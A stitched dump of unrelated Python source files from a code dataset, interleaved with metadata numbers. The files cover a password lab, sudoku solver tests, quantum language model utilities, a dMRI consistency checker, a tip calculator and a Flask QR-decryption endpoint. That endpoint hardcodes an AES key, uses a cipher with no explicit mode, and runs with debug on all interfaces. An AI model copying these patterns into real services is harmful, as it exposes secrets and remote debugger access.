[ "MIT" ]
null
null
null
CS-190/Labs/Lab6.py
lividsubset3/College-CS
6f1eb6b10e43a37654335331758677c797034961
[ "MIT" ]
null
null
null
CS-190/Labs/Lab6.py
lividsubset3/College-CS
6f1eb6b10e43a37654335331758677c797034961
[ "MIT" ]
null
null
null
# Pair Programming

# BUG FIX: the original `passphrase = "Megmo" and "megmo"` evaluated to just
# "megmo" (the `and` of two truthy strings), and the success condition tested
# `not null1` etc. -- the truthiness of the constant strings themselves, which
# is always False -- so the "Correct" branch was unreachable and the loop
# never terminated. Accept either capitalisation and test substring absence.
PASSPHRASES = ("Megmo", "megmo")

# Substrings that must not appear anywhere in a valid password.
null1 = "123"
null2 = "letmein"
null3 = "password"


def validate_password(password):
    """Validate *password* against the forbidden substrings and passphrases.

    Returns a tuple ``(is_valid, messages)`` where ``messages`` is the list
    of rejection messages to show (empty when no forbidden substring is
    present). ``is_valid`` is True only when the password contains one of
    the accepted passphrases and no forbidden substring.
    """
    messages = []
    if null3 in password:
        messages.append("Incorrect | Password has password inside")
    if null2 in password:
        messages.append("Incorrect | password has letmein")
    if null1 in password:
        messages.append("Incorrect | Password has 123")
    has_phrase = any(phrase in password for phrase in PASSPHRASES)
    return (has_phrase and not messages), messages


if __name__ == "__main__":
    # Prompt until a valid password is entered.
    while True:
        password = str(input("Please enter password: "))
        valid, messages = validate_password(password)
        for message in messages:
            print(message)
        if valid:
            print("Correct | Password validated")
            break
22.5
72
0.655556
66
540
5.363636
0.409091
0.112994
0.127119
0.20339
0.29661
0.29661
0
0
0
0
0
0.037313
0.255556
540
23
73
23.478261
0.843284
0.02963
0
0
0
0
0.342912
0
0
0
0
0
0
1
0
false
0.733333
0
0
0
0.266667
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
99e157d8a51a96d3537d160b4ad726d341cf4d8c
149
py
Python
pywky/db/__init__.py
loganjhennessy/worky
d94a1ea0fcde95c3257a7d1e438bf3c589b60559
[ "MIT" ]
null
null
null
pywky/db/__init__.py
loganjhennessy/worky
d94a1ea0fcde95c3257a7d1e438bf3c589b60559
[ "MIT" ]
null
null
null
pywky/db/__init__.py
loganjhennessy/worky
d94a1ea0fcde95c3257a7d1e438bf3c589b60559
[ "MIT" ]
null
null
null
from sqlalchemy import create_engine

from pywky.db.models import Base

# Development database: a local SQLite file next to the process.
engine = create_engine('sqlite:///worky_dev.db')

# Bind the declarative metadata to this engine so table operations can run
# without passing the engine explicitly.
Base.metadata.bind = engine
21.285714
48
0.791946
22
149
5.227273
0.636364
0.208696
0
0
0
0
0
0
0
0
0
0
0.107383
149
6
49
24.833333
0.864662
0
0
0
0
0
0.147651
0.147651
0
0
0
0
0
1
0
false
0
0.5
0
0.5
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
4
99e2c1f902345ae0e7cb8b3c3a60e5be6b0705b4
2,680
py
Python
QLM_utils.py
qiuchili/PyQLM
ccd5f64f86cf88f618e30808d598f3785f5e6483
[ "MIT" ]
null
null
null
QLM_utils.py
qiuchili/PyQLM
ccd5f64f86cf88f618e30808d598f3785f5e6483
[ "MIT" ]
null
null
null
QLM_utils.py
qiuchili/PyQLM
ccd5f64f86cf88f618e30808d598f3785f5e6483
[ "MIT" ]
null
null
null
# -*- coding:utf-8 -*-
from __future__ import division
import numpy as np
import os
import math
import pickle as Pickle
import pynlpir
import random
from math import log
from numpy import linalg as LA


def F(rhoM, proDict):
    """Objective value: sum over projectors of p_i * log(tr(P_i . rho)).

    rhoM is a (dim, dim) density matrix; proDict maps a key to
    [probability, projector-matrix].
    """
    # print rhoM
    res = 0
    for pm in proDict:
        P = np.trace(np.dot(proDict[pm][1], rhoM))
        res += proDict[pm][0] * log(P)
    # print('value of target F function = {}'.format(res))
    return res


def Grad_F(rhoM, proDict, dim):
    """Gradient of F with respect to rho: sum p_i * P_i / tr(P_i . rho)."""
    res = np.zeros((dim, dim))
    for pm in proDict:
        trace_val = np.trace(np.dot(proDict[pm][1], rhoM))
        res += (proDict[pm][0] * proDict[pm][1] / trace_val)
    return res


def rho_bar(rhoM, proDict, dim):
    # Symmetrised one-step update: (G.rho + rho.G) / 2, G = Grad_F(rho).
    grad_f = Grad_F(rhoM, proDict, dim)
    res = (np.dot(grad_f, rhoM) + np.dot(rhoM, grad_f)) / 2
    return res


def rho_tilde(rhoM, proDict, dim):
    # Congruence update normalised to unit trace: G.rho.G / tr(G.rho.G).
    grad_f = Grad_F(rhoM, proDict, dim)
    grad_rho_grad = np.dot(np.dot(grad_f, rhoM), grad_f)
    res = grad_rho_grad / np.trace(grad_rho_grad)
    return res


def D_bar(rhoM, proDict, dim):
    # Direction from the symmetrised update: rho_bar - rho.
    return(rho_bar(rhoM, proDict, dim) - rhoM)


def D_tilde(rhoM, proDict, dim):
    # Direction from the congruence update: rho_tilde - rho.
    return(rho_tilde(rhoM, proDict, dim) - rhoM)


def q_t(t, rhoM, proDict, dim):
    # Normalisation factor q(t) = 1 + 2t + t^2 * tr(G.rho.G).
    grad_f = Grad_F(rhoM, proDict, dim)
    grad_rho_grad = np.dot(np.dot(grad_f, rhoM), grad_f)
    res = 1 + 2 * t + t * t * np.trace(grad_rho_grad)
    return res


def D(t, rhoM, proDict, dim):
    # Formula (19): combined search direction
    # (2/q) * D_bar + (t * tr(G.rho.G) / q) * D_tilde.
    grad_f = Grad_F(rhoM, proDict, dim)
    grad_rho_grad = np.dot(np.dot(grad_f, rhoM), grad_f)
    d_bar = D_bar(rhoM, proDict, dim)
    d_tilde = D_tilde(rhoM, proDict, dim)
    q = q_t(t, rhoM, proDict, dim)
    res = (2 / q) * d_bar + (t * np.trace(grad_rho_grad) / q) * d_tilde
    return res


def set_t(t):
    # Clamp the step size from below at 1.
    return max(1, t)


def judgement(rhoM, proDict, f_old, dim, threshold_values=(1e-7, 1e-7, 1e-7)):
    """Convergence check: return True while iteration should continue.

    Stops (returns False) when rho is close to both G.rho.G and G.rho and
    the objective change |f_old - F(rho)| is below its threshold.
    """
    grad_f = Grad_F(rhoM, proDict, dim)
    grad_rho_grad = np.dot(np.dot(grad_f, rhoM), grad_f)
    grad_rho = np.dot(grad_f, rhoM)
    diff = f_old - F(rhoM, proDict)
    if(LA.norm(rhoM - grad_rho_grad) < threshold_values[0] and
       LA.norm(rhoM - grad_rho) < threshold_values[1] and
       abs(diff) < threshold_values[2]):
        return False
    else:
        return True


def judge_t(t, d, rhoM, proDict, dim, iter_r):
    """Step-size acceptance test.

    Accepts t when F(rho + t*d) <= F(rho) + iter_r * t * tr(Grad_F . d),
    i.e. the change is bounded by a fraction of the predicted linear change;
    an exactly unchanged objective is rejected.
    """
    # print 'please see here:'
    f_new = F(rhoM + t * d, proDict)
    f_old = F(rhoM, proDict)
    diff = iter_r * t * np.trace(np.dot(Grad_F(rhoM, proDict, dim), d))
    if(f_new == f_old):
        return False
    # print(f_new-f_old)
    return(f_new <= f_old + diff)


def test_set_generator(proj_num, vector_dim):
    """Build a random test dictionary {word_i: [weight, rank-1 projector]}.

    Each projector is the outer product of a random unit vector with itself
    (non-deterministic: uses np.random without a fixed seed).
    """
    dictionary = {}
    for i in range(proj_num):
        weight = np.random.random()
        vector = np.random.rand(1, vector_dim)
        vector = vector / (math.sqrt(np.dot(vector, np.transpose(vector))))
        projector = np.outer(vector, vector) / np.inner(vector, vector)
        dictionary['word_' + str(i)] = [weight, projector]
    return dictionary
26.8
140
0.691791
494
2,680
3.574899
0.184211
0.143262
0.150623
0.06342
0.463194
0.292752
0.270102
0.253681
0.253681
0.218573
0
0.010582
0.153731
2,680
100
141
26.8
0.768078
0.050746
0
0.256757
0
0
0.00197
0
0
0
0
0
0
1
0.162162
false
0
0.121622
0.040541
0.432432
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99e3ac14b2ccc4454ba52221648a884910d0156c
69
py
Python
run.py
econchick/foodify
87b2e395b4e720c1425f56fba790a4be2e8fdea9
[ "Zlib" ]
1
2016-09-29T16:51:00.000Z
2016-09-29T16:51:00.000Z
run.py
econchick/foodify
87b2e395b4e720c1425f56fba790a4be2e8fdea9
[ "Zlib" ]
null
null
null
run.py
econchick/foodify
87b2e395b4e720c1425f56fba790a4be2e8fdea9
[ "Zlib" ]
null
null
null
#! /usr/bin/env python

from foodify import app

# Launch the Flask development server with debug mode on.
app.run(debug=True)
17.25
23
0.724638
12
69
4.166667
0.916667
0
0
0
0
0
0
0
0
0
0
0
0.144928
69
4
24
17.25
0.847458
0.304348
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
4
99e3d3333d7aa18597378ca4a913a1eccc683dc6
4,400
py
Python
evaluations.py
leandrocoding/sudoku
708649bada5b219f50a0cb977ad4317b7e7be2f6
[ "MIT" ]
4
2020-07-05T08:19:40.000Z
2021-01-02T03:00:27.000Z
evaluations.py
leandrocoding/sudoku
708649bada5b219f50a0cb977ad4317b7e7be2f6
[ "MIT" ]
1
2021-03-13T10:41:59.000Z
2021-03-13T10:41:59.000Z
evaluations.py
leandrocoding/sudoku
708649bada5b219f50a0cb977ad4317b7e7be2f6
[ "MIT" ]
null
null
null
"""This python script can be used to test the correctness and finiteness of the algorithms.""" from multiprocessing import Process from BASolver2 import bASolve, bASolverHandle from OPBASolver import OPSolverHandle import time # bASolve() class NonFiniteException(Exception): pass def testcorrectness(algo): """"Test the algorithm specified in <algo> algo: 1: BA-Algorithm 2: OPBA-Algorithm 3: Algorithm X The input will be passed to the algorithm directly """ if algo == 1: return testBA() elif algo == 2: return testOPBA() elif algo == 3: return testAlgoX() def locBASOLVE(grid): print(bASolverHandle(grid)) # print(grid) def testBA(): inputs = [] validInput = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 0, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(validInput) wrongdim = [[1,2,3,4],[4,3,2,1],[2,1,4,3],[3,4,1,2]] # 4x4 instead of 9x9 inputs.append(wrongdim) # 8 is two times in a collomn at start, therfore unsolvable. invStart = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 8, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(invStart) # 22 is not valid. 
invNumbers = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 22, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(invNumbers) emptyinp = [[0 for _ in range(9)] for _ in range(9)] inputs.append(emptyinp) for inp in inputs: proc = Process(target=locBASOLVE, args=[inp]) proc.start() curtim = time.time() proc.join(timeout=11) # This stops the test if it takes longer than 10 seconds if abs(curtim-time.time()) >10: print("ERROR, took longer than 10 seconds. Stoped after 10 seconds") raise NonFiniteException("The solver took more than 10 seconds.") proc.terminate() print("NEXT") def testOP(): inputs = [] validInput = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 0, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(validInput) wrongdim = [[1,2,3,4],[4,3,2,1],[2,1,4,3],[3,4,1,2]] # 4x4 instead of 9x9 inputs.append(wrongdim) # 8 is two times in a collomn at start, therfore unsolvable. invStart = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 8, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(invStart) # 22 is not valid. 
invNumbers = [[7, 8, 0, 4, 0, 0, 1, 2, 0], [6, 22, 0, 0, 7, 5, 0, 0, 9], [0, 0, 7, 0, 4, 0, 2, 6, 0], [9, 0, 4, 0, 6, 0, 0, 0, 5], [0, 0, 1, 0, 5,0, 9, 3, 0], [0, 0, 0, 6, 0, 1, 0, 7, 8], [0, 7, 0, 3, 0, 0, 0, 1, 2], [1, 2, 0, 0, 0, 7, 4, 0, 0], [0, 4, 9, 2, 0, 6, 0, 0, 7]] inputs.append(invNumbers) # Empty field: emptyinp = [[0 for _ in range(9)] for _ in range(9)] inputs.append(emptyinp) for inp in inputs: proc = Process(target=OPSolverHandle, args=[inp]) proc.start() curtim = time.time() proc.join(timeout=11) # This stops the test if it takes longer than 10 seconds if abs(curtim-time.time()) >10: print("ERROR, took longer than 10 seconds. Stoped after 10 seconds") raise NonFiniteException("The solver took more than 10 seconds.") proc.terminate() print("NEXT") def testOPBA(): pass def testAlgoX(): pass if __name__ == "__main__": testBA() testOP() testAlgoX() # print(bASolverHandle([[0 for _ in range(9)] for _ in range(9)]))
35.483871
278
0.503409
851
4,400
2.586369
0.13396
0.094503
0.051795
0.025443
0.722853
0.722853
0.722853
0.722853
0.722853
0.712403
0
0.183504
0.289091
4,400
124
279
35.483871
0.520141
0.1475
0
0.641791
0
0
0.05614
0
0
0
0
0
0
1
0.089552
false
0.044776
0.059701
0
0.208955
0.074627
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
5
99e491fbbf30f0808a4fe6456d18b36c7d57a986
1,647
py
Python
src/server.py
vishwajithsandaru/party-qr-generator-flask
10c44ec8aa03e561e9e6415b681a0e200184b120
[ "MIT" ]
null
null
null
src/server.py
vishwajithsandaru/party-qr-generator-flask
10c44ec8aa03e561e9e6415b681a0e200184b120
[ "MIT" ]
null
null
null
src/server.py
vishwajithsandaru/party-qr-generator-flask
10c44ec8aa03e561e9e6415b681a0e200184b120
[ "MIT" ]
null
null
null
from flask import Flask, request, jsonify
import base64
from Crypto.Cipher import AES

# Removed defective imports: `from crypt import methods` (Unix-only, unused,
# shadows nothing useful) and `from this import s` (prints the Zen of Python
# as an import side effect); also dropped unused os/urllib/requests/notebook imports.

app = Flask(__name__)

# 16-byte AES key and the character used to pad plaintext to the block size.
secret = 'TESTTESTTESTTEST'
p_char = '%'


def unpad_str(msg):
    """Decode *msg* (bytes) to text and strip the trailing padding characters."""
    msg = msg.decode('utf-8')
    # Use the shared padding constant instead of a duplicated '%' literal.
    msg = msg.rstrip(p_char)
    return msg


def decrypt_message(msg, key):
    """Base64-decode then AES-decrypt *msg* with *key*; return the unpadded text.

    Raises:
        Exception: with message 'Error Decrypting' when decryption fails.
    """
    decoded_encrypted_msg = base64.b64decode(msg)
    # NOTE(review): AES.new() without an explicit mode only works on legacy
    # PyCrypto (ECB default, str keys); pycryptodome requires a mode argument
    # and a bytes key — confirm which library is deployed before changing.
    cipher = AES.new(key)
    try:
        decrypted_msg = cipher.decrypt(decoded_encrypted_msg)
    except Exception:
        # Narrowed from a bare except so SystemExit/KeyboardInterrupt propagate.
        raise Exception('Error Decrypting')
    else:
        return unpad_str(decrypted_msg)


def decode_str(msg):
    """Parse a decrypted 'id:name:email:emp_no:bev1;bev2:food' record into a dict."""
    msg = msg.rstrip(p_char)
    splitted = msg.split(':')
    splitted_bev = splitted[4].split(';')
    resp_dect = {}
    resp_dect['id'] = int(float(splitted[0]))
    resp_dect['name'] = splitted[1]
    resp_dect['email'] = splitted[2]
    # '0.0' encodes a missing employee number.
    resp_dect['emp_no'] = 'N/A' if (splitted[3] == '0.0') else splitted[3]
    resp_dect['beverages'] = splitted_bev
    resp_dect['food_preference'] = splitted[5]
    return resp_dect


@app.route("/decrypt", methods=['GET'])
def decrypt():
    """Decrypt the 'enc_str' query parameter and return the parsed record as JSON."""
    args = request.args
    encrypted_string = args.get('enc_str')
    try:
        dec_str = decrypt_message(encrypted_string, secret)
    except Exception:
        return jsonify({'error': 'Invalid User!!'}), 400, {'ContentType': 'application/json'}
    else:
        processed_res = decode_str(dec_str)
        return jsonify({'data': processed_res}), 200, {'ContentType': 'application/json'}


if __name__ == "__main__":
    app.run(host="0.0.0.0", debug=True)
25.734375
93
0.659381
217
1,647
4.774194
0.428571
0.061776
0.017375
0.023166
0
0
0
0
0
0
0
0.019757
0.200971
1,647
63
94
26.142857
0.767477
0
0
0.12
0
0
0.120219
0
0
0
0
0
0
1
0.08
false
0
0.14
0
0.32
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99e52f49796b5d41076aba34de619bcc405c5d52
155
py
Python
m06_file1.py
AmreshTripathy/Advance-Python
0cfe3fc263af1080edbf9167895a51d27be64993
[ "Apache-2.0" ]
null
null
null
m06_file1.py
AmreshTripathy/Advance-Python
0cfe3fc263af1080edbf9167895a51d27be64993
[ "Apache-2.0" ]
null
null
null
m06_file1.py
AmreshTripathy/Advance-Python
0cfe3fc263af1080edbf9167895a51d27be64993
[ "Apache-2.0" ]
null
null
null
def greet(name):
    """Print a good-morning greeting addressed to *name*."""
    message = f'Good morning, {name}'
    print(message)


if __name__ == '__main__':
    person = input('Enter Your name: ')
    greet(person)
19.375
36
0.574194
20
155
3.85
0.65
0.233766
0
0
0
0
0
0
0
0
0
0
0.258065
155
7
37
22.142857
0.669565
0.103226
0
0
0
0
0.346154
0
0
0
0
0
0
1
0.2
false
0
0
0
0.2
0.2
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
99e565c6c04330549af61e5e41e6e64599dd5a85
404
py
Python
Day 02 - Beginner - Understanding Data Types and How to Manipulate Strings/04_PROJECT_tip_calculator.py
not-lucky/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022
2c21c190ab756176bd7b577b3f8a0370b75c3828
[ "MIT" ]
null
null
null
Day 02 - Beginner - Understanding Data Types and How to Manipulate Strings/04_PROJECT_tip_calculator.py
not-lucky/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022
2c21c190ab756176bd7b577b3f8a0370b75c3828
[ "MIT" ]
null
null
null
Day 02 - Beginner - Understanding Data Types and How to Manipulate Strings/04_PROJECT_tip_calculator.py
not-lucky/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022
2c21c190ab756176bd7b577b3f8a0370b75c3828
[ "MIT" ]
null
null
null
print("wewcome to the tip cawcuwatow. >_<")

# Gather the three inputs needed to split the bill.
bill = float(input("What is the total bill?\n$"))
tip_percentage = float(input("What percentage tip will you like to give?\n"))
split_among = int(input("How many people to split the bill?\n"))

# Add the tip, then divide evenly and round to cents.
tip_amount = bill * tip_percentage / 100
total_bill_with_tip = bill + tip_amount
each_pay = round(total_bill_with_tip / split_among, 2)

print(f"Each person should pay: ${each_pay:.2f}")
36.727273
77
0.725248
68
404
4.117647
0.5
0.096429
0.1
0.114286
0
0
0
0
0
0
0
0.014327
0.136139
404
10
78
40.4
0.787966
0
0
0
0
0
0.443069
0
0
0
0
0
0
1
0
false
0
0
0
0
0.285714
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99ea05eb7467ddb1c7614fa510b122a7f9c67b31
4,619
py
Python
lib/consistencyCheck.py
pnlbwh/multi-shell-dMRIharmonization
46e207c5d2b7fd68ddbbd1b305c33cfd45351ee8
[ "CNRI-Python", "Info-ZIP" ]
4
2020-04-28T15:31:07.000Z
2022-02-15T07:04:21.000Z
lib/consistencyCheck.py
pnlbwh/multi-shell-dMRIharmonization
46e207c5d2b7fd68ddbbd1b305c33cfd45351ee8
[ "CNRI-Python", "Info-ZIP" ]
30
2019-11-10T20:51:34.000Z
2021-04-19T19:08:14.000Z
lib/consistencyCheck.py
pnlbwh/multi-shell-dMRIharmonization
46e207c5d2b7fd68ddbbd1b305c33cfd45351ee8
[ "CNRI-Python", "Info-ZIP" ]
3
2019-10-18T16:06:03.000Z
2021-02-21T01:10:45.000Z
#!/usr/bin/env python

# ===============================================================================
# dMRIharmonization (2018) pipeline is written by-
#
# TASHRIF BILLAH
# Brigham and Women's Hospital/Harvard Medical School
# tbillah@bwh.harvard.edu, tashrifbillah@gmail.com
#
# ===============================================================================
# See details at https://github.com/pnlbwh/dMRIharmonization
# Submit issues at https://github.com/pnlbwh/dMRIharmonization/issues
# View LICENSE at https://github.com/pnlbwh/dMRIharmonization/blob/master/LICENSE
# ===============================================================================

from conversion import read_bvals, read_imgs, read_imgs_masks
import numpy as np
from warnings import warn
from plumbum import local
from util import abspath, load, isfile, getpid
from findBshells import findBShells
import sys


def check_bshells(ref_imgs, ref_bvals):
    """Verify every image in *ref_imgs* has exactly the b-shells *ref_bvals*.

    Raises FileNotFoundError when an image is missing and ValueError listing
    the unmatched cases when any image has different b-shells.
    """
    unmatched = []
    for imgPath in ref_imgs:
        imgPath = local.path(imgPath)
        if not imgPath.exists():
            # Bug fix: the exception object was constructed but never raised,
            # so a missing image fell through to findBShells and failed there.
            raise FileNotFoundError(imgPath)

        inPrefix = abspath(imgPath).split('.nii')[0]
        bvals = findBShells(inPrefix + '.bval')

        if (bvals == ref_bvals).all():
            print('b-shells matched for', imgPath.name)
        else:
            print(f'\nUnmatched b-shells for {imgPath.name}')
            print(bvals)
            print(f'ref_bvals {ref_bvals}\n')
            unmatched.append(imgPath._path)

    print('')
    if len(unmatched):
        print('Unmatched cases:')
        print(unmatched)
        raise ValueError('Leave out the unmatched cases or change the reference case for determining b-shell to run multi-shell-dMRIharmonization')
    else:
        print('All cases have same b-shells. Data is good for running multi-shell-dMRIharmonization')
    print('')


def check_resolution(ref_imgs, ref_res):
    """Verify every image in *ref_imgs* has the spatial resolution *ref_res*.

    Raises FileNotFoundError when an image is missing and ValueError listing
    the unmatched cases when any image has a different resolution.
    """
    unmatched = []
    for imgPath in ref_imgs:
        imgPath = local.path(imgPath)
        if not imgPath.exists():
            # Bug fix: the exception object was constructed but never raised.
            raise FileNotFoundError(imgPath)

        res = load(imgPath._path).header['pixdim'][1:4]

        # Bug fix: sum the *absolute* differences — signed differences could
        # cancel out and mask a genuine resolution mismatch.
        if abs(res - ref_res).sum() <= 10e-6:
            print('spatial resolution matched for', imgPath.name)
        else:
            print(f'\nUnmatched spatial resolution for {imgPath.name}')
            print(res)
            print(f'ref_res {ref_res}\n')
            unmatched.append(imgPath._path)

    print('')
    if len(unmatched):
        print('Unmatched cases:')
        print(unmatched)
        raise ValueError('Leave out the unmatched cases or change the reference case for determining spatial resolution to run multi-shell-dMRIharmonization')
    else:
        print('All cases have same spatial resolution. Data is good for running multi-shell-dMRIharmonization')
    print('')


def consistencyCheck(ref_csv, outputBshellFile=None, outPutResolutionFile=None):
    """Check b-shell and spatial-resolution consistency across images in *ref_csv*.

    The first image (or the cached files, when present) defines the reference
    b-shells and resolution; all other images must match.
    """
    try:
        ref_imgs, _ = read_imgs_masks(ref_csv)
    except Exception:
        # The csv may contain a single dwi column instead of dwi,mask pairs.
        ref_imgs = read_imgs(ref_csv)

    if isfile(outputBshellFile) and isfile(outPutResolutionFile):
        ref_bvals = read_bvals(outputBshellFile)
        ref_res = np.load(outPutResolutionFile)
    else:
        # Use the first image as the reference and cache its properties.
        ref_bshell_img = ref_imgs[0]
        print(f'Using {ref_bshell_img} to determine b-shells')
        inPrefix = abspath(ref_bshell_img).split('.nii')[0]
        ref_bvals = findBShells(inPrefix + '.bval', outputBshellFile)
        ref_res = load(ref_bshell_img).header['pixdim'][1:4]
        np.save(outPutResolutionFile, ref_res)

    print('b-shells are', ref_bvals)
    print('\nSite', ref_csv, '\n')
    print('Checking consistency of b-shells among subjects')
    check_bshells(ref_imgs, ref_bvals)
    print('spatial resolution is', ref_res)
    print('Checking consistency of spatial resolution among subjects')
    check_resolution(ref_imgs, ref_res)


if __name__ == '__main__':

    if len(sys.argv) == 1 or sys.argv[1] == '-h' or sys.argv[1] == '--help':
        print('''Check consistency of b-shells and spatial resolution among subjects
Usage: consistencyCheck list.csv/txt ref_bshell_bvalues.txt ref_res_file.npy
Provide a csv/txt file with first column for dwi and 2nd column for mask: dwi1,mask1\\ndwi2,mask2\\n... or just one column for dwi1\\ndwi2\\n...
In addition, provide ref_bshell_bvalues and ref_res_file.''')
        exit()

    ref_csv = abspath(sys.argv[1])
    outputBshellFile = abspath(sys.argv[2])
    outPutResolutionFile = abspath(sys.argv[3])
    if isfile(ref_csv):
        consistencyCheck(ref_csv, outputBshellFile, outPutResolutionFile)
    else:
        raise FileNotFoundError(f'{ref_csv} does not exists.')
32.076389
158
0.646677
563
4,619
5.174068
0.296625
0.022657
0.013732
0.016478
0.354617
0.354617
0.276691
0.276691
0.248541
0.248541
0
0.007311
0.200476
4,619
143
159
32.300699
0.781478
0.136826
0
0.311111
0
0.033333
0.31412
0.042034
0
0
0
0
0
1
0.033333
false
0
0.077778
0
0.111111
0.277778
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99ebaf6f0294d590f15abaa22804c5ca352ff36f
1,283
py
Python
tests/test_cross_corr.py
halomod/halomod
f4f207ac70ed32a7f7e16139698c85eda1f0b6a9
[ "MIT" ]
4
2021-02-23T13:28:59.000Z
2022-02-11T15:53:57.000Z
tests/test_cross_corr.py
halomod/halomod
f4f207ac70ed32a7f7e16139698c85eda1f0b6a9
[ "MIT" ]
20
2021-02-02T15:08:28.000Z
2021-09-20T18:26:49.000Z
tests/test_cross_corr.py
halomod/halomod
f4f207ac70ed32a7f7e16139698c85eda1f0b6a9
[ "MIT" ]
3
2021-03-07T15:28:34.000Z
2021-08-21T21:41:44.000Z
import numpy as np
from halomod.cross_correlations import ConstantCorr, CrossCorrelations


def test_cross_same():
    """Cross-correlating two identical components must reproduce the auto correlation."""
    component_params = {
        "exclusion_model": "NoExclusion",
        "sd_bias_model": None,
        "transfer_model": "EH",
        "force_1halo_turnover": False,
    }
    cross = CrossCorrelations(
        cross_hod_model=ConstantCorr,
        halo_model_1_params=dict(component_params),
        halo_model_2_params=dict(component_params),
    )
    auto = cross.halo_model_1

    # 2-halo terms match exactly.
    assert np.allclose(cross.power_2h_cross, auto.power_2h_auto_tracer)
    assert np.allclose(cross.corr_2h_cross, auto.corr_2h_auto_tracer)

    # 1-halo terms only agree approximately: cross-pairs differ from
    # auto-pairs, since auto can count self-correlations.
    assert np.allclose(
        cross.corr_1h_cross,
        auto.corr_1h_auto_tracer,
        atol=1e-5,
        rtol=1e-1,
    )
    assert np.allclose(
        cross.power_1h_cross,
        auto.power_1h_auto_tracer,
        atol=1e-6,
        rtol=1e-1,
    )
29.837209
89
0.643804
165
1,283
4.69697
0.406061
0.069677
0.064516
0.108387
0.531613
0.353548
0.216774
0.216774
0.216774
0.216774
0
0.025478
0.265783
1,283
42
90
30.547619
0.79724
0.157443
0
0.375
0
0
0.139665
0
0
0
0
0
0.125
1
0.03125
false
0
0.0625
0
0.09375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99ed550f29778c36dd9474368aebbf80d7e96b69
7,570
py
Python
apps/graphs/bandwidth_performance_graph.py
cucl-srg/Measuring-Burstiness
b9024bf606362d5587773a0c5b892fcb97a3d577
[ "Apache-2.0" ]
1
2022-03-21T02:26:27.000Z
2022-03-21T02:26:27.000Z
apps/graphs/bandwidth_performance_graph.py
cucl-srg/Measuring-Burstiness
b9024bf606362d5587773a0c5b892fcb97a3d577
[ "Apache-2.0" ]
null
null
null
apps/graphs/bandwidth_performance_graph.py
cucl-srg/Measuring-Burstiness
b9024bf606362d5587773a0c5b892fcb97a3d577
[ "Apache-2.0" ]
1
2020-08-10T16:46:05.000Z
